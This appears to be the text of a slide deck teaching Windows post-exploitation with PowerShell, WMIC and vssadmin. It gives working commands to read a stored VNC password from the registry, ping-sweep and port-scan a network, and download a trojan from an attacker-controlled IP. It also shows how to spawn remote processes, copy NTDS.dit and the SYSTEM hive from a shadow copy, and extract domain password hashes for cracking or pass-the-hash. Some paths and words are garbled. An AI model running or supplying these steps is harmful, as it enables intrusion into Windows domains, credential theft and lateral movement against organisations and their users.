This encompasses different techniques employed by leveraging powershell and attacking the systems in different ways. It is an interesting agglomeration of combined methods in plundering a windows box

1. Post exploitation using
powershell

2. $whoami
MIHIR SHAH | SHAHENSHAH
Github : github.com/shahenshah99

3. Powershell Fundamentals
PowerShell is a command-line and scripting
language framework for task automation and
configuration management. For the Windows pen
tester of today, it's a comprehensive and powerful
tool in your arsenal that just so happens to be
installed on all of your victim PCs.

4. What is Powershell?
When I described PowerShell as a task automation and
configuration management framework, that's more along
the lines of Microsoft's definition of PowerShell. As
hackers, we think of what things can do, not necessarily
how their creators defined them; in that sense, PowerShell
is the Windows command line on steroids.

5. Powershell Cmdlets
A cmdlet is really just a command, at least conceptually;
behind the scenes, they're .NET classes for implementing
particular functionality. They're the native body of
commands within PowerShell and they use a unique self-
explanatory syntax style: Verb-Noun.

6. Working With registry
> $FormatEnumerationLimit = -1
> Get-ItemProperty -Path
registry::hklmsoftwareTightVNCServer -Name
ControlPassword
> $password = 139, 16, 57, 246, 188, 35, 53, 209
> ForEach ($hex in $password) {
>> [Convert]::ToString($hex, 16) }

7. ICMP Enum
So, you have your foothold on a Windows box. Setting
aside the possibility of uploading our own tools, can we use
a plain off-the-shelf copy of Windows to poke around for a
potential next stepping stone? With PowerShell, there isn't
much we can't do.

8. > 1..255 | % {echo "192.168.63.$_"; ping -n 1
-w 100 192.168.63.$_ | Select-String ttl}

9. if we have the access to fire off PowerShell, don't
we have the access to meterpreter our way in
and/or upload a tool set?

10. Now that we have a host in mind, we can learn
more about it with this one liner designed to
attempt TCP connections to all specified ports:

11. > 1..1024 | % {echo ((New-Object
Net.Sockets.TcpClient).Connect("192.168.63.147
", $_)) "Open port - $_"} 2>$null

12. Delivering a Trojan to your target via
PowerShell
> (New-Object
System.Net.WebClient).DownloadFile("http://192.16
8.63.143/attack1.exe",
"c:windowstempattack1.exe")

13. Named pipes and security
Concepts
The named pipe concept gives the pipe a name, and by having
a name, it utilizes the filesystem so that interaction with it is like
interacting with a file. Remember the purpose of our pipelines, to
take the output of a command and pipe it as input to another
command.

14. named pipes, although they work a lot like files, cannot
actually be mounted in the filesystem. They have their own
filesystem and are referenced with .pipe[name]. There
are functions available to the software developer to work
with named pipes (for example CreateFile, WriteFile, and
CloseHandle)

16. WMIC
WMIC is the name of a tool and it stands for
Windows Management Instrumentation Command.

17. The tool allows us to perform WMI operations. WMI
is the Windows infrastructure for operations and
management data. In addition to providing
management data to other parts of Windows and
other products altogether, it's possible to automate
administrative tasks both locally and remotely with
WMI scripts and applications

18. WMIC commands fired off at the command line leave no
traces of software or code lying around. While WMI
activity can be logged, many organizations fail to turn it
on or review the logs.
In almost any Windows environment, WMI and
PowerShell can't be blocked.

19. TRY THIS
useraccount list /format:list

20. Being a little Ambitious?
/node:[IP address] /user:[DOMAIN][User]
computersystem list brief /format:list

21. How about actually
spawning something?
/node:[IP address] /user:[DOMAIN][User] header:
path win32_process call create "calc.exe"

22. Any Ideas?

23. Plundering Domain
Controllers by vssadmin

24. Creating a shadow file
> vssadmin Create Shadow /For=C:

25. The NTDS database is stored in the NTDS
directory under Windows, and you'll find
SYSTEM inside the system32config folder.

26. Creating a copy of the shadow file to
retrieve by the attacking box
> copy
?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
WindowsNTDSNTDS.dit c:
> copy
?GLOBALROOTDeviceHarddiskVolumeShadowCo
py1Windowssystem32configSYSTEM c:

27. Retrieving files your
favourite way
apt-get install cifs-utils

28. Mount the filesystem to the
attacking box
mount -t cifs //<IP>/C$ -o username=Administrator
/root/mount/

29. Password hash extraction with libesedb and
ntdsxtract
# git clone https://github.com/libyal/libesedb
# git clone https://github.com/csababarta/ntdsxtract
# cd libesedb
# apt-get install git autoconf automake autopoint libtool pkg-config build-
essentia
l# ./synclibs.sh
# ./autogen.sh
# chmod +x configure
# ./configure
# make
# make install
# ldconfig

30. Exporting all the tables from
NTDS database
# esedbexport -m tables ntds.dit

31. Where’s the hash?
We can pass the data table and link table to the dsusers
Python script, along with the location of the SYSTEM hive
(which contains the SYSKEY), and ask the script to nicely
format our hashes into a cracker-friendly format:

32. # cd ntdsxtract
# python dsusers.py
/root/ntds/ntds.dit.export/datatable
/root/ntds/ntds.dit.export/link_table /root/ntds --
syshive /root/ntds/SYSTEM --passwordhashes -
-lmoutfile /root/ntds/lm.txt --ntoutfile
/root/ntds/nt.txt --pwdformat ophc

33. You may either crack the
password using John or just
pass-the-hash using
mimikatz

34. Any Questions?

35. THANK YOU